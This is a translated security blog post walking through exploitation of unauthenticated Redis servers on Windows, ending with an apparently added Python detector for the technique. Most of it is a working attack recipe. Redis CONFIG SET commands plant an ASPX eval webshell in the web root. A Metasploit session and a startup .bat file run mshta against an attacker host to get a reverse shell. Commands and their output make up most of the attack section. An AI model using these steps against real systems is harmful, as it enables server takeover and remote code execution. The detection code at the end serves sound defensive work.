Exploiting Redis unauthorized access on Windows

Author: 鸿鹄实验室
Published: 2021-04-15 13:04:04

Connect to the Redis server with the Redis client or with telnet:

⚡ root@kali  redis/src  ./redis-cli -h 192.168.1.124 -p 6379
or
⚡ root@kali  ~  telnet 192.168.1.124 6379

After connecting, enter info to check the connection status.

Exploitation methods:

1. Writing a webshell

⚡ root@kali  redis/src  ./redis-cli -h 192.168.1.124 -p 6379
192.168.1.124:6379> CONFIG SET dir C:/inetpub/wwwroot
OK
192.168.1.124:6379> CONFIG SET dbfilename evil.aspx
OK
192.168.1.124:6379> set webshell "<%eval request('x')%>"
OK
192.168.1.124:6379> save

2. Reverse shell

First, load this script (PS_shell.rb):

msf5 > use  exploit/windows/redis/PS_shell  
msf5 exploit(windows/redis/PS_shell) > show options

Module options (exploit/windows/redis/PS_shell):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/redis/PS_shell) > set uri
set urihost  set uripath  set uriport  
msf5 exploit(windows/redis/PS_shell) > set urip
set uripath  set uriport  
msf5 exploit(windows/redis/PS_shell) > set uripath 123456
uripath => 123456
msf5 exploit(windows/redis/PS_shell) > show options

Module options (exploit/windows/redis/PS_shell):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  123456           no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/redis/PS_shell) > exploit 
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.149:4444 
[*] Using URL: http://0.0.0.0:8080/123456
[*] Local IP: http://192.168.1.149:8080/123456
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.149:8080/123456"
msf5 exploit(windows/redis/PS_shell) >

Then run the following in redis-cli:

192.168.1.131:6379> config set dir "C:/Users/liukaifeng01/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"
OK
192.168.1.131:6379> config set dbfilename 1.bat
OK
192.168.1.131:6379> config set dbfilename 1.bat
OK
192.168.1.131:6379> set x "\r\n\r\mshta.exe "http://192.168.1.149:8080/123456"\r\n\r\n"
Invalid argument(s)
192.168.1.131:6379> set x "\r\n\r\mshta http://192.168.1.149:8080/123456\rOK\r\n"
192.168.1.131:6379> save
OK

The file has been written successfully.

Here we manually reboot the target machine, after which a shell connects back.
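On the detection side, both methods above leave the same sequence on the wire: CONFIG SET dir and dbfilename, then SAVE. The following Python is an added example, not code from the original article; it parses a reassembled client-to-server Redis stream (RESP framing from redis-cli, inline commands from telnet) and flags that sequence. The watch lists, the `resp` helper and the sample stream are assumptions constructed for illustration.

```python
import shlex

# Assumed watch lists: the two directories this article writes to, plus script-like extensions.
RISKY_DIR = ("inetpub/wwwroot", "start menu/programs/startup")
RISKY_EXT = (".asp", ".aspx", ".php", ".jsp", ".bat", ".cmd", ".ps1", ".vbs", ".hta")

def parse_commands(stream: bytes):
    """Yield commands from a client-to-server stream: RESP arrays (redis-cli) or inline (telnet)."""
    pos = 0
    try:
        while (eol := stream.find(b"\r\n", pos)) != -1:
            head, pos = stream[pos:eol], eol + 2
            if head.startswith(b"*"):                # RESP array header: *<argc>
                args = []
                for _ in range(int(head[1:])):
                    eol = stream.find(b"\r\n", pos)  # bulk string header: $<len>
                    size = int(stream[pos + 1:eol])
                    args.append(stream[eol + 2:eol + 2 + size].decode("latin-1"))
                    pos = eol + 2 + size + 2         # skip payload and its CRLF
                yield args
            elif head.strip():                       # inline command line
                yield shlex.split(head.decode("latin-1"))
    except ValueError:                               # truncated or malformed capture
        return

def detect(stream: bytes):
    """Alert on SAVE/BGSAVE issued after dir/dbfilename were repointed somewhere risky."""
    pending, alerts = {}, []
    for args in parse_commands(stream):
        words = [a.lower() for a in args]
        if words[:2] == ["config", "set"]:
            for key, value in zip(words[2::2], args[3::2]):
                if key in ("dir", "dbfilename"):
                    pending[key] = value
        elif words[:1] in (["save"], ["bgsave"]) and pending:
            path = pending.get("dir", "").replace("\\", "/").lower()
            name = pending.get("dbfilename", "").lower()
            hits = {"dir": any(d in path for d in RISKY_DIR), "dbfilename": name.endswith(RISKY_EXT)}
            reasons = [key for key, hit in hits.items() if hit]
            if reasons:
                alerts.append({**pending, "reasons": reasons})
    return alerts

# Constructed sample (not a real capture): resp() frames commands as redis-cli would; the value is a placeholder.
def resp(line: str) -> bytes:
    parts = line.encode().split()
    return b"*%d\r\n" % len(parts) + b"".join(b"$%d\r\n%s\r\n" % (len(p), p) for p in parts)
SAMPLE = b"".join(map(resp, ["CONFIG SET dir C:/inetpub/wwwroot",
                             "CONFIG SET dbfilename evil.aspx", "SET k PLACEHOLDER", "SAVE"]))
```

CONFIG SET changes server-wide state, so a per-connection view misses these commands when they are split across connections; correlate per server where possible.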

Originally published: 2020-01-18

This article is shared from the 鸿鹄实验室 WeChat official account.
